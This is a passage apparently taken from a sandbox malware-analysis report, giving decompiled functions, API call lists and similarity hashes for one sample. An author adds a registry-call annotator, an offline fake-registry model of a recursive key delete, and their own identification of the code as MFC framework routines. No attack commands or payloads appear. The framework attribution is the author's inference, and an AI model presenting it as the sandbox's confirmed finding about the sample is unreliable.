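    call = Call(m["api"], m["module"], int(m["ref"], 16), args)
    if call.api in REG_ARGS:
        hkey_idx, sam_idx = REG_ARGS[call.api]
        hkey = _hex_arg(args, hkey_idx)
        if hkey is not None:
            call.notes.append("hKey=" + HIVES.get(hkey, f"0x{hkey:08x} (handle from an earlier open)"))
        sam = _hex_arg(args, sam_idx)
        if sam is not None:
            call.notes.append("samDesired=" + decode_sam(sam))
    return call


# Lines copied from the APIs sections of E009B3D0B and E009B3ED7 in this report.
SAMPLE_LINES = [
    "• __EH_prolog3_catch_GS.LIBCMT ref: 009B3D15",
    "• RegOpenKeyExA.ADVAPI32(80000000,00000010,00000000,0002001F,?), ref: 009B3DCC",
    "• RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 009B3DEF",
    "• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000008,?), ref: 009B3FCB",
    "• RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 009B4024",
]


def annotate(lines):
    """Return (api, ref, notes) for every registry call found in the lines."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call is not None and call.api in REG_ARGS:
            out.append((call.api, call.ref, call.notes))
    return out


if __name__ == "__main__":
    for api, ref, notes in annotate(SAMPLE_LINES):
        print(f"{ref:08x} {api:<16} {'; '.join(notes) or '-'}")
    print("0x103 / 0x3f2 in E009B3D0B:", decode_status(0x103), "/", decode_status(0x3F2))
```

Run it on the APIs block of any function in the report; prolog and other non-call lines are skipped, and a handle argument the sandbox could not recover (`?`) is left unannotated rather than guessed.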

      C-Code - Quality: 78%
      			E009B3ED7(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
      				void _t36;
      				void* _t46;
      				long _t60;
      				void* _t65;
      				void* _t81;
      				void* _t82;
      				intOrPtr _t90;
      
      				_t77 = __edx;
      				_t68 = __ecx;
      				_t67 = __ebx;
      				_push(0x124);
      				E00AAD29B(0xac83cc, __ebx, __edi, __esi);
      				_t81 = __ecx;
      				 *(_t82 - 0x120) = 0;
      				 *(_t82 - 0x12c) = 0;
      				_t36 = E009B3980(__ecx, __edx);
      				 *(_t82 - 0x128) = _t36;
      				if(_t36 != 0) {
      					do {
      						_t65 = _t82 - 0x128;
      						_push(_t65);
      						_t68 = _t81;
      						E009B3991();
      						if(_t65 != 0) {
      							_t77 =  *_t65;
      							_t68 = _t65;
      							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
      						}
      					} while ( *(_t82 - 0x128) != 0);
      				}
      				if( *((intOrPtr*)(_t81 + 0x58)) != 0) {
      					_t90 =  *((intOrPtr*)(_t81 + 0x6c));
      					_t91 = _t90 == 0;
      					if(_t90 == 0) {
      						E009B8782(_t68);
      					}
      					_push("Software\\");
      					E009AFB60(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
      					 *((intOrPtr*)(_t82 - 4)) = 0;
      					E009A938A(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x58)));
      					_push("\\");
      					_push(_t82 - 0x11c);
      					_push(_t82 - 0x130);
      					_t46 = E009B3C43(_t67, _t77, 0, _t81, _t91);
      					_push( *((intOrPtr*)(_t81 + 0x6c)));
      					 *((char*)(_t82 - 4)) = 1;
      					_push(_t46);
      					_push(_t82 - 0x124);
      					E009B3C43(_t67, _t77, 0, _t81, _t91);
      					_t72 =  *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0;
      					 *((char*)(_t82 - 4)) = 3;
      					E009A5510( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
      					_t81 = 0x80000001;
      					E009B3D0B(_t67,  *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77, 0, 0x80000001, _t91, 0x80000001, _t82 - 0x124, 0);
      					if(RegOpenKeyExA(0x80000001,  *(_t82 - 0x11c), 0, 8, _t82 - 0x120) == 0) {
      						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
      						_t93 = _t60 - 0x103;
      						if(_t60 == 0x103) {
      							E009B3D0B(_t67, _t72, _t77, 0, 0x80000001, _t93, 0x80000001, _t82 - 0x11c, 0);
      						}
      						RegCloseKey( *(_t82 - 0x120));
      					}
      					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
      					E009A5510( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
      					E009A5510( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
      				}
      				return E00AAD31E(_t67, 0, _t81);
      			}

      Per-line instruction addresses (column collapsed): 0x009b3ed7 to 0x009b404e

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B3EE1
      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000008,?), ref: 009B3FCB
      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 009B3FE8
      • RegCloseKey.ADVAPI32(?), ref: 009B4009
      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 009B4024
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseEnumH_prolog3_OpenQueryValue
      • String ID: Software\
      • API String ID: 1666054129-964853688
      • Opcode ID: 877a3ec906e51605c07d277101d19553822def4bc89e05105aaf034fd44d96f6
      • Instruction ID: d74bd79924b587f1cbb014ca0c797dbdf6b2bc6c7e45967d523ae9cbe7eb0991
      • Opcode Fuzzy Hash: 877a3ec906e51605c07d277101d19553822def4bc89e05105aaf034fd44d96f6
      • Instruction Fuzzy Hash: 82417F31900518ABCB21EB64CD45FEEB7BDAF8A720F10869AF146E2191DB349B91CF50
      Uniqueness

      Uniqueness Score: -1.00%
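Read together, E009B3D0B and the registry half of E009B3ED7 form an unregister routine: delete Software\<key>\<profile> recursively, then delete Software\<key> as well when RegEnumKeyA on it returns ERROR_NO_MORE_ITEMS (0x103); and when the unnamed check E009BD042 returns 1, a request against HKEY_CLASSES_ROOT (0x80000000) is rewritten to HKEY_CURRENT_USER\Software\Classes\... (per-user class registration). That shape matches MFC's AfxDelRegTreeHelper and CWinApp::Unregister, which is my identification from the call sequence and strings, not something the report states; if it holds, these two functions are statically linked framework code that removes the application's own keys, and are context rather than an indicator on their own. The model below is an added example, not code from the report: it replaces the Win32 registry with an in-memory fake (constructed sample hive contents, not taken from the report) so the control flow can be run offline, including the two details that matter when reading the decompile: enumeration always uses index 0 because each recursion removes the child it just enumerated, and one child that cannot be deleted leaves every ancestor in place, because the delete of a key is only attempted after ERROR_NO_MORE_ITEMS or ERROR_BADKEY (0x3f2). The alternative path through E009B3262/E009B39AA, taken when the third argument is non-zero, is not modelled.

```python
"""Runnable model of E009B3D0B (recursive key delete) and the part of E009B3ED7
that calls it. Added example, not code from the report; the Win32 registry is
replaced by an in-memory fake so the control flow can be run offline."""
ERROR_SUCCESS, ERROR_FILE_NOT_FOUND, ERROR_ACCESS_DENIED = 0, 2, 5
ERROR_NO_MORE_ITEMS, ERROR_BADKEY = 0x103, 0x3F2          # the two codes E009B3D0B accepts
HKEY_CLASSES_ROOT, HKEY_CURRENT_USER = 0x80000000, 0x80000001
KEY_READ_WRITE, KEY_ENUMERATE_SUB_KEYS = 0x2001F, 0x8      # samDesired values seen in the calls


class FakeRegistry:
    """Keys as nested dicts; open handles are (root, path) tuples; values are not
    modelled. RegDeleteKey refuses non-empty keys, as the real API does, and
    `protected` stands for keys the caller lacks DELETE rights on."""

    def __init__(self, tree, protected=()):
        self.roots = {HKEY_CLASSES_ROOT: tree["HKCR"], HKEY_CURRENT_USER: tree["HKCU"]}
        self.protected, self.calls = set(protected), []

    @staticmethod
    def _join(base, sub):
        return f"{base}\\{sub}" if base else sub

    @staticmethod
    def _split(hkey):                      # predefined hive constant or an open handle
        return (hkey, "") if isinstance(hkey, int) else hkey

    def _node(self, root, path):
        node = self.roots[root]
        for part in path.split("\\") if path else []:
            node = node.get(part)
            if node is None:               # an empty key is {} and must still count as present
                return None
        return node

    def open_key(self, hkey, subkey, sam):
        root, base = self._split(hkey)
        path = self._join(base, subkey)
        if self._node(root, path) is None:
            return ERROR_FILE_NOT_FOUND, None
        self.calls.append(("RegOpenKeyEx", path, sam))
        return ERROR_SUCCESS, (root, path)

    def enum_key(self, handle, index):
        names = sorted(self._node(*handle))
        return (ERROR_SUCCESS, names[index]) if index < len(names) else (ERROR_NO_MORE_ITEMS, None)

    def delete_key(self, hkey, subkey):
        root, base = self._split(hkey)
        path = self._join(base, subkey)
        parent_path, _, name = path.rpartition("\\")
        parent = self._node(root, parent_path)
        if parent is None or name not in parent:
            return ERROR_FILE_NOT_FOUND
        if path in self.protected or parent[name]:
            return ERROR_ACCESS_DENIED
        del parent[name]
        self.calls.append(("RegDeleteKey", path))
        return ERROR_SUCCESS

    def close_key(self, handle):
        self.calls.append(("RegCloseKey", handle[1]))


def del_reg_tree(reg, hkey, key_name, per_user=False):
    """E009B3D0B. `per_user` stands for the unnamed check made by E009BD042."""
    if hkey == HKEY_CLASSES_ROOT and per_user:           # HKCR -> HKCU\Software\Classes\<key>
        hkey, key_name = HKEY_CURRENT_USER, "Software\\Classes\\" + key_name
    status, h = reg.open_key(hkey, key_name, KEY_READ_WRITE)
    if status != ERROR_SUCCESS:
        return status
    while True:
        status, child = reg.enum_key(h, 0)               # always index 0: children vanish as we go
        if status != ERROR_SUCCESS:
            break
        status = del_reg_tree(reg, h, child)             # recursion gets the open handle, not the hive
        if status != ERROR_SUCCESS:
            break                                        # one undeletable child stops the walk
    if status in (ERROR_NO_MORE_ITEMS, ERROR_BADKEY):    # only now is the key itself deleted
        status = reg.delete_key(hkey, key_name)
    reg.close_key(h)
    return status


def unregister(reg, company, profile):
    """Registry part of E009B3ED7: drop Software\\<company>\\<profile>, then
    Software\\<company> too if nothing else is left under it."""
    company_key = "Software\\" + company
    del_reg_tree(reg, HKEY_CURRENT_USER, company_key + "\\" + profile)
    status, h = reg.open_key(HKEY_CURRENT_USER, company_key, KEY_ENUMERATE_SUB_KEYS)
    if status == ERROR_SUCCESS:
        if reg.enum_key(h, 0)[0] == ERROR_NO_MORE_ITEMS:
            del_reg_tree(reg, HKEY_CURRENT_USER, company_key)
        reg.close_key(h)


def sample_tree():                                       # constructed sample, not from the report
    return {"HKCU": {"Software": {
                "Classes": {"MyApp.Document": {"shell": {"open": {"command": {}}}}},
                "Vendor": {"App": {"Settings": {}, "Recent File List": {}}},
                "OtherVendor": {"A": {}, "B": {}}}},
            "HKCR": {"MyApp.Document": {}}}


def run_demo():
    reg = FakeRegistry(sample_tree())
    unregister(reg, "Vendor", "App")                     # company key becomes empty -> removed too
    unregister(reg, "OtherVendor", "A")                  # sibling B keeps the company key alive
    redirected = del_reg_tree(reg, HKEY_CLASSES_ROOT, "MyApp.Document", per_user=True)
    locked = FakeRegistry(sample_tree(), protected={"Software\\Vendor\\App\\Settings"})
    return {"software": sorted(reg.roots[HKEY_CURRENT_USER]["Software"]),
            "hkcr": sorted(reg.roots[HKEY_CLASSES_ROOT]),
            "redirected": redirected,
            "deletes": [c[1] for c in reg.calls if c[0] == "RegDeleteKey"],
            "locked": del_reg_tree(locked, HKEY_CURRENT_USER, "Software\\Vendor\\App"),
            "locked_left": sorted(locked.roots[HKEY_CURRENT_USER]["Software"]["Vendor"]["App"])}
```

`run_demo()` shows the deletion order (deepest key first, then the company key once it is empty), that the HKCR entry is untouched when the request was redirected to HKCU\Software\Classes, and that a single protected leaf leaves the whole Software\Vendor\App branch behind with ERROR_ACCESS_DENIED propagated to the caller.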

      C-Code - Quality: 97%
      			E009A87C2(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t37;
      				intOrPtr _t39;
      				int _t42;
      				intOrPtr _t49;
      				signed int _t69;
      				signed int _t70;
      				struct HWND__* _t72;
      				signed int _t75;
      				void* _t76;
      
      				_t69 = __edx;
      				_t61 = __ecx;
      				_push(0x1c);
      				_t37 = E00AAD232(0xac7cbb, __ebx, __edi, __esi);
      				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
      				 *((intOrPtr*)(__ecx + 0xd8)) =  *((intOrPtr*)(__ecx + 0xd8)) + 1;
      				if( *((intOrPtr*)(__ecx + 0xd8)) <= 1) {
      					_t39 = E009AE492(__ecx, __edi);
      					 *((intOrPtr*)(_t76 - 0x10)) = _t39;
      					if(_t39 == 0) {
      						L2:
      						E009B8782(_t61);
      					}
      					_t75 = 0;
      					 *(_t76 - 0x28) = 0xad7ba4;
      					 *((intOrPtr*)(_t76 - 0x24)) = 0;
      					 *((intOrPtr*)(_t76 - 0x18)) = 0;
      					 *((intOrPtr*)(_t76 - 0x1c)) = 0;
      					 *(_t76 - 0x20) = 0;
      					 *(_t76 - 4) = 0;
      					_t72 = GetWindow(GetDesktopWindow(), 5);
      					if(_t72 != 0) {
      						do {
      							_t42 = IsWindowEnabled(_t72);
      							_t83 = _t42;
      							if(_t42 != 0 && E009AC937(0, _t61, _t69, _t72, _t75, _t83, _t72) != 0 && E009A64A1( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)) + 0x20)), _t72) != 0 && SendMessageA(_t72, 0x36c, 0, 0) == 0) {
      								EnableWindow(_t72, 0);
      								_t61 = _t76 - 0x28;
      								E00A2601F(_t76 - 0x28, _t75, _t72);
      								_t75 =  *(_t76 - 0x20);
      							}
      							_t72 = GetWindow(_t72, 2);
      						} while (_t72 != 0);
      						if(_t75 != 0) {
      							_t90 = _t75 > 0;
      							if(_t75 > 0) {
      								goto L2;
      							} else {
      								_t70 = 4;
      								_t18 = _t75 + 1; // 0x1
      								_t69 = _t18 * _t70 >> 0x20;
      								_t49 = E009A6291(_t90,  ~(0 | _t90 > 0x00000000) | _t18 * _t70);
      								_t73 =  *((intOrPtr*)(_t76 - 0x14));
      								_t61 = _t75 << 2;
      								 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x14)) + 0xdc)) = _t49;
      								 *((intOrPtr*)((_t75 << 2) + _t49)) = 0;
      								if((0 |  *((intOrPtr*)(_t76 - 0x24)) != 0x00000000) == 0) {
      									goto L2;
      								} else {
      									E009A681A( *((intOrPtr*)(_t73 + 0xdc)), _t61,  *((intOrPtr*)(_t76 - 0x24)), _t61);
      								}
      							}
      						}
      					}
      					 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
      					_t37 = E009A8471(0, _t76 - 0x28);
      				}
      				return E00AAD30A(_t37);
      			}

      Per-line instruction addresses (column collapsed): 0x009a87c2 to 0x009a88f3

      APIs
      • __EH_prolog3.LIBCMT ref: 009A87C9
      • GetDesktopWindow.USER32 ref: 009A8811
      • GetWindow.USER32(00000000), ref: 009A8818
      • IsWindowEnabled.USER32(00000000), ref: 009A8829
      • SendMessageA.USER32 ref: 009A8855
      • EnableWindow.USER32(00000000,00000000), ref: 009A8861
      • GetWindow.USER32(00000000,00000002), ref: 009A8877
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$DesktopEnableEnabledException@8H_prolog3MessageSendThrow
      • String ID:
      • API String ID: 1477819144-0
      • Opcode ID: b5aaf1bbd07cffbc7b682a37262fe9423862b4a677250a4a97638fcf823f90a8
      • Instruction ID: 4b88b55f24bed3f3c04840f43ec8d1a5c6e1a2045b7a53fc0b7f5fd581c80ced
      • Opcode Fuzzy Hash: b5aaf1bbd07cffbc7b682a37262fe9423862b4a677250a4a97638fcf823f90a8
      • Instruction Fuzzy Hash: 77318F72A002159BDB14EFB58D89ABFBABCFF4A704F54453EE112A6191DF358D01CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 95%
      			E009A88F4(intOrPtr* __ecx, void* __edx, long _a4) {
      				void* __ebx;
      				void* _t26;
      				signed int _t27;
      				long _t40;
      				signed int _t43;
      				void* _t52;
      				intOrPtr* _t55;
      
      				_t52 = __edx;
      				_t47 = __ecx;
      				_t43 = _a4;
      				_t55 = __ecx;
      				if(_t43 != 0 && ( *(__ecx + 0x58) & 0x00000004) != 0) {
      					E009B0C13(__ecx, 0);
      					return SetFocus(0);
      				}
      				_t26 = E009AC90B(_t43, _t47, _t52, GetParent( *(_t55 + 0x20)));
      				if(_t26 == 0) {
      					L5:
      					if(_t43 != 0) {
      						_t27 =  *(_t55 + 0x58);
      						if(_t27 < 0) {
      							 *(_t55 + 0x58) = _t27 & 0xffffff7f;
      							 *((intOrPtr*)( *_t55 + 0x108))();
      							_a4 =  *(_t55 + 0x20);
      							if(GetActiveWindow() == _a4) {
      								SendMessageA(_a4, 6, 1, 0);
      							}
      						}
      						if(( *(_t55 + 0x58) & 0x00000020) != 0) {
      							SendMessageA( *(_t55 + 0x20), 0x86, 1, 0);
      						}
      					} else {
      						if( *((intOrPtr*)(_t55 + 0xd8)) == 0) {
      							 *(_t55 + 0x58) =  *(_t55 + 0x58) | 0x00000080;
      							 *((intOrPtr*)( *_t55 + 0x104))();
      						}
      					}
      					asm("sbb ebx, ebx");
      					return E009A6EE5(_t55, ( ~_t43 & 0xfffffff0) + 0x20);
      				} else {
      					_a4 = 0;
      					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
      					_t40 = GetCurrentProcessId();
      					if(_t40 == _a4) {
      						return _t40;
      					}
      					goto L5;
      				}
      			}

      Per-line instruction addresses (column collapsed): 0x009a88f4 to 0x009a89d6

      APIs
      • SetFocus.USER32(00000000,00000000), ref: 009A8914
      • GetParent.USER32(?), ref: 009A8922
      • GetWindowThreadProcessId.USER32(?,?), ref: 009A893D
      • GetCurrentProcessId.KERNEL32 ref: 009A8943
      • GetActiveWindow.USER32 ref: 009A8996
      • SendMessageA.USER32 ref: 009A89AA
      • SendMessageA.USER32 ref: 009A89BE
        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
      • String ID:
      • API String ID: 2169720751-0
      • Opcode ID: 870e250d4fac3e761b80fa793636e117225b3a847a750fb44cb6902791641f6d
      • Instruction ID: 7a2d8a44b383cad23a0b7e1452d13362af29a521f5d5e439f3b6ad24e156a1cb
      • Opcode Fuzzy Hash: 870e250d4fac3e761b80fa793636e117225b3a847a750fb44cb6902791641f6d
      • Instruction Fuzzy Hash: 3721C171200708AFCB219F64CCC8BAB7BA9FFC5714F244519F5CA861A1DB75A8818BD1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 65%
      			E009ACC36(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				void* _t23;
      				struct HINSTANCE__* _t25;
      				void* _t29;
      				signed int _t31;
      				struct HINSTANCE__* _t36;
      				intOrPtr* _t38;
      				signed int _t46;
      				void* _t52;
      				void* _t53;
      
      				_t39 = __ecx;
      				_push(0);
      				E00AAD232(0xac7fd1, __ebx, __edi, __esi);
      				_t38 = __ecx;
      				_t49 =  *(_t53 + 8) & 0x0000ffff;
      				if(_t49 == 0) {
      					L16:
      					_t23 = E009AC865(_t38, _t39, _t49, __eflags);
      				} else {
      					_t56 =  *0xd0fb50 & 0x00000001;
      					if(( *0xd0fb50 & 0x00000001) == 0) {
      						 *0xd0fb50 =  *0xd0fb50 | 0x00000001;
      						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
      						_push("user32.dll");
      						_t36 = E009AB6E5(__ecx, __esi, _t56);
      						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
      						_pop(_t39);
      						 *0xd0fb4c = _t36;
      					}
      					_t25 =  *0xd0fb4c; // 0x0
      					if(_t25 == 0) {
      						_t25 = E009B8782(_t39);
      					}
      					if(( *0xd0fb50 & 0x00000002) == 0) {
      						 *0xd0fb50 =  *0xd0fb50 | 0x00000002;
      						 *0xd0fb48 = GetProcAddress(_t25, "GetTouchInputInfo");
      					}
      					if(( *0xd0fb50 & 0x00000004) == 0) {
      						 *0xd0fb50 =  *0xd0fb50 | 0x00000004;
      						 *0xd0fb44 = GetProcAddress( *0xd0fb4c, "CloseTouchInputHandle");
      					}
      					if( *0xd0fb48 == 0) {
      						L15:
      						_t39 = _t38;
      						goto L16;
      					} else {
      						_t64 =  *0xd0fb44;
      						if( *0xd0fb44 == 0) {
      							goto L15;
      						} else {
      							_t46 = 0x28;
      							_t52 = E009A6291(_t64,  ~(0 | _t64 > 0x00000000) | _t49 * _t46);
      							if(_t52 == 0) {
      								goto L15;
      							} else {
      								_t29 =  *0xd0fb48( *((intOrPtr*)(_t53 + 0xc)), _t49, _t52, 0x28);
      								_t39 = _t38;
      								if(_t29 == 0) {
      									goto L16;
      								} else {
      									_t31 =  *((intOrPtr*)( *_t38 + 0x128))(_t49, _t52);
      									_t49 = _t31;
      									E009A62C0();
      									 *0xd0fb44( *((intOrPtr*)(_t53 + 0xc)), _t52);
      									if(_t31 == 0) {
      										goto L15;
      									} else {
      										_t23 = 0;
      									}
      								}
      							}
      						}
      					}
      				}
      				return E00AAD30A(_t23);
      			}

      Per-line instruction addresses (column collapsed): 0x009acc36 to 0x009acd3d

      APIs
      • __EH_prolog3.LIBCMT ref: 009ACC3D
      • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 009ACCA2
      • GetProcAddress.KERNEL32(CloseTouchInputHandle,00000000), ref: 009ACCC4
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateH_prolog3
      • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
      • API String ID: 1001276555-1853737257
      • Opcode ID: 9edf7aad1b963a89916876f54ddd0f3e89594e3c8e652f10fcea224d7fce80a0
      • Instruction ID: 8790a1d6c4698f2a7734c131bd8bfec29493d7bfe82cb12f7cc37f9d0de6773e
      • Opcode Fuzzy Hash: 9edf7aad1b963a89916876f54ddd0f3e89594e3c8e652f10fcea224d7fce80a0
      • Instruction Fuzzy Hash: 8A21D6B16013419BD734AB74DE297297FA8AB56B60F25453DE809DB7E1CB749800CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetParent.USER32(0000E900), ref: 009AA8A9
      • GetWindowRect.USER32 ref: 009AA8CD
      • ScreenToClient.USER32 ref: 009AA8E0
      • ScreenToClient.USER32 ref: 009AA8E9
      • EqualRect.USER32 ref: 009AA8F0
      • DeferWindowPos.USER32(?,009AD1D8,00000000,?,?,?,?,00000014), ref: 009AA91A
      • SetWindowPos.USER32(009AD1D8,00000000,?,?,?,?,00000014,?,009AD1D8,00000000,00000000,0000E900,?,00000001), ref: 009AA924
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ClientRectScreen$DeferEqualParent
      • String ID:
      • API String ID: 443303494-0
      • Opcode ID: 43e74df6190955fda62c44a4f9881958b5e5c7769401339c9254c73fbb285a2b
      • Instruction ID: d490ee03130c6d467aa86716b8413969d6fe29d0adf6ec168313c548468d9c71
      • Opcode Fuzzy Hash: 43e74df6190955fda62c44a4f9881958b5e5c7769401339c9254c73fbb285a2b
      • Instruction Fuzzy Hash: 9821E275900209EFDB04DFA4DC849AFBBB9FF48300B11852AE916D3254E7349905CB61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E009BBBB9(void* __edi, struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
      				signed int _v8;
      				struct tagRECT _v24;
      				signed int _v28;
      				struct tagPOINT _v36;
      				void* __esi;
      				signed int _t26;
      				struct tagPOINT _t28;
      				signed int _t29;
      				signed int _t39;
      				void* _t43;
      				intOrPtr _t44;
      				signed int _t45;
      				void* _t48;
      				struct HWND__* _t51;
      				signed int _t52;
      
      				_t49 = __edi;
      				_t26 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t26 ^ _t52;
      				_t44 = _a12;
      				_t28 = _a8;
      				_t51 = _a4;
      				_push(_t44);
      				_v36.x = _t28;
      				_v36.y = _t44;
      				_t29 = RealChildWindowFromPoint(_t51, _t28);
      				_t45 = _t29;
      				_v28 = _t45;
